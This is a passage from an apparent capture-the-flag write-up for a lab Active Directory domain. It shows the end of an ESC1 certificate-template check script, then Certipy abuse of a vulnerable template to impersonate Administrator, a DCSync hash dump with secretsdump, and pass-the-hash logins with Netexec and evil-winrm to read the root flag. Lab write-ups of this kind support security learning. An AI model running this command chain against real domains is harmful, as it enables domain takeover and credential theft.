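if __name__ == "__main__":
    for tpl in (WELCOME_TEMPLATE, HARDENED_TEMPLATE):
        print(check_esc1(tpl))
```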
└─$ certipy-ad req -u 'svc_ca@welcome.local' -p 'Password123!' -dc-ip 10.0.27.151 -target DC01.WELCOME.Local -ca WELCOME-CA -template 'Welcome-Template' -upn 'administrator@welcome.local' -sid 'S-1-5-21-141921413-1529318470-1830575104-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@welcome.local'
[*] Certificate object SID is 'S-1-5-21-141921413-1529318470-1830575104-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip 10.0.27.151
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@welcome.local'
[*] SAN URL SID: 'S-1-5-21-141921413-1529318470-1830575104-500'
[*] Using principal: 'administrator@welcome.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@welcome.local': aad3b435b51404eeaad3b435b51404ee:0cf1[..SNIPED..]
We can confirm if the Administrator credentials are valid using Netexec.
└─$ nxc smb 10.0.27.151 -u Administrator -H 0cf1[..SNIPED..]
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\Administrator:0cf1[..SNIPED..] (Pwn3d!)
We can also perform a DCSync attack to retrieve the credentials of every domain account.
└─$ secretsdump.py welcome.local/Administrator@DC01.welcome.local -hashes :0cf1[..SNIPED..] -just-dc-ntlm
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0cf1[..SNIPED..]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\e.hills:1105:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\j.crickets:1106:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\e.blanch:1107:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\i.park:1108:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\j.johnson:1109:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\a.harris:1110:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\svc_ca:1112:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\svc_web:1114:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
[*] Cleaning up...
Root Flag
We can connect to the DC using the Administrator hash through the WinRM service.
└─$ evil-winrm-py -i DC01.welcome.local -u Administrator -H '0cf1[..SNIPED..]'
[evil-winrm-py v1.5.0 banner]
[*] Connecting to 'DC01.welcome.local:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents> cd ..
evil-winrm-py PS C:\Users\Administrator> cd Desktop
evil-winrm-py PS C:\Users\Administrator\Desktop> type root.txt
[Flag_Redacted]
evil-winrm-py PS C:\Users\Administrator\Desktop>
Thanks for reading along, and see you again soon as I try to be more regular with my write-ups!